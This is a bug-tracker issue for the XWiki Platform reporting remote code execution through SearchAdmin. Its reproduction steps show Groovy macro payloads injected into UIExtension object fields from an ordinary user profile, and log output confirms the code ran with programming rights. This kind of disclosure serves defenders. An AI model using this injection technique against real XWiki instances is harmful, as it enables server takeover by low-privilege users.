Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-21200

RCE from account through SearchAdmin



    • Unit
    • Unknown
    • N/A
    • N/A


      Steps to reproduce:

      1. Edit your user profile (or any other document) with the objects editor.
      2. Add an object of type XWiki.UIExtensionClass
      3. Set "Extension Point Id" to "org.xwiki.platform.search"
      4. Set "Extension ID" to
        {{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from extension id succeeded!"){{/groovy}}{{/async}}
      5. Set "Extension Parameters" to
        label={{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack from label succeeded!"){{/groovy}}{{/async}}
      6. Set "Extension Scope" to "Current User"
      7. The editor should look like this:  Click Save.
      8. Open the page XWiki.SearchAdmin (e.g., on http://localhost:8080/xwiki/bin/view/XWiki/SearchAdmin)

      Expected result:

      Either only the default database and Solr search engine are list under "Default search engine" or the full entered label is displayed. Also, no error log message is displayed.

      Actual result:

      An empty option is displayed in the search engine selection and the following log messages are display:

      2023-08-02 15:28:53,572 [org.xwiki.rendering.async.internal.AsyncRendererJob@13f37da2([async, macro, xwiki:XWiki.SearchAdmin, 241, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchAdmin, 375])] ERROR attacker                       - Attack from extension id succeeded! 
      2023-08-02 15:28:53,572 [org.xwiki.rendering.async.internal.AsyncRendererJob@240f13c6([async, macro, xwiki:XWiki.SearchAdmin, 246, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchAdmin, 376])] ERROR attacker                       - Attack from label succeeded! 

      This shows that we've gained programming right from a simple user profile with edit right just on a single page like the user profile (default editable for the user).

      From the code, this seems to have been introduced in XWIKI-8746 so XWiki 4.5RC1.


        Issue Links



              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              0 Vote for this issue
              1 Start watching this issue